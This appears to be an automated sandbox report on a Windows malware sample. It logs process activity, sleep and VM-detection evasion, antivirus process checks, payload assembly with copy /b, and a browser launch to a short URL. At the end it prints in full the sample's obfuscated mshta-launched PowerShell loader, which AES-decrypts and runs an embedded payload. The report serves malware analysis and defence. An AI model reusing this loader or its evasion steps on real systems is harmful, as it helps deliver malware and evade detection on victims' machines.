Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5205	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4278	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6211	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2562	Jump to behavior

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Producing

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3572	Thread sleep count: 6211 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456	Thread sleep count: 2562 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6772	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\findstr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem

Source: C:\Windows\SysWOW64\findstr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Code function: 8_2_00A75080 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,	8_2_00A75080
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Code function: 8_2_00A73C80 FindFirstFileW,FindClose,SetLastError,CompareFileTime,	8_2_00A73C80
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Code function: 8_2_00A74ED0 _DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,	8_2_00A74ED0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: mshta.exe, 00000000.00000003.2003585857.0000000002BC3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 00000000.00000003.2003585857.0000000002BC3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}lIa
Source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: powershell.exe, 00000004.00000002.2125166141.0000000008CAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Code function: 8_2_00A79F30 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,

8_2_00A79F30

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Code function: 8_2_00A97CD5 SetUnhandledExceptionFilter,		8_2_00A97CD5
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Code function: 8_2_00A97F44 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		8_2_00A97F44

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Code function: 8_2_00A71E40 memset,_DebugHeapAllocator,ShellExecuteExW,WaitForSingleObject,CloseHandle,

8_2_00A71E40

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ \| powershell -	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\ClassroomEc.exe "C:\Users\user\AppData\Roaming\ClassroomEc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 30253	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 30253\Identification.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Conf 30253\m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif 30253\Identification.pif 30253\m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $giwxcqo = 'aaaaaaaaaaaaaaaaaaaaah+ni+e0b2ks3mmnd0sjpk+fk7mupfilz9vvektme+yyv7vbgriarnlhwocdd3xnpyazs1tppp56hnlmknzg3rqllzowww3pr9gtvi4pqrfz4ymgg1kimek8k6tsh0fmp/6pzslccm7m343xsrtqho71kivioxddv9rxueizsvv/r8wv5pa7k2heaf/g1dnaet06jn6lwy+3xxybiz8z2sgfrwiakmlk9dab/leruy0oedx+hdr0opeuvodl8s3tyxpu555rlx05ctd0togq2y+lnpx6fd4bm0mfpap0pqtz0trl0pba/499qw6oyztygixjq47fiytqqcaizp9wkwplfvpxmsua7noylmdcjhqwuyn6keasq952ex0uepaiptsxaqoa6loyomefpb1evpj3uzmpl9bhjdqjhn1/olox0/aplc7vbmqv7fidtyco5ezzrtdcgspb4g8s6vz9sjg0qng+jhmufydvdumhxrj23a1qyqubslmhjdw4snduud7htfvqeags/sl3nlutqkpifmztty2alus2sdq4ofb+z/wvupl80+6+lh5xqnj8m1zd2oz2juag9qcds6ed1lwbdfwkgk1cexwfukroqw+5t52gj98o+jln7pagkzcbb87qc9dofnvz0xr6nvkj3ydwbpve9gy2ursq2smekc28xeg/ogbv4h/40vymmq48szmio+dl98hetduyjda10+uktzg0zrz9tre7n2dualc7akhfke8xxtlsjebjab+74tbyhg6tbn3q8jestwfhavcg/74qyryhv51rgapus4yimlfgdci+kn5tho8qhfy2apvsjgwwvc4nanwywkeodgvs3cud2h7z0etr930+qcff';$pavnvyn = 'ew1fbe1lt2rgdgv3txdrulpywffrbnzgefdtd1r3z2w=';$hgjhdnd = new-object 'system.security.cryptography.aesmanaged';$hgjhdnd.mode = [system.security.cryptography.ciphermode]::ecb;$hgjhdnd.padding = [system.security.cryptography.paddingmode]::zeros;$hgjhdnd.blocksize = 128;$hgjhdnd.keysize = 256;$hgjhdnd.key = [system.convert]::frombase64string($pavnvyn);$fmshi = [system.convert]::frombase64string($giwxcqo);$hwklsipl = $fmshi[0..15];$hgjhdnd.iv = $hwklsipl;$bkvkozaiu = $hgjhdnd.createdecryptor();$wonqxsfki = $bkvkozaiu.transformfinalblock($fmshi, 16, $fmshi.length - 16);$hgjhdnd.dispose();$lmmkhz = new-object system.io.memorystream( , $wonqxsfki );$dylrlk = new-object system.io.memorystream;$cyowfotfz = new-object system.io.compression.gzipstream $lmmkhz, ([io.compression.compressionmode]::decompress);$cyowfotfz.copyto( $dylrlk );$cyowfotfz.close();$lmmkhz.close();[byte[]] $ohxploz = $dylrlk.toarray();$mkeeaj = [system.text.encoding]::utf8.getstring($ohxploz);$mkeeaj \| powershell -
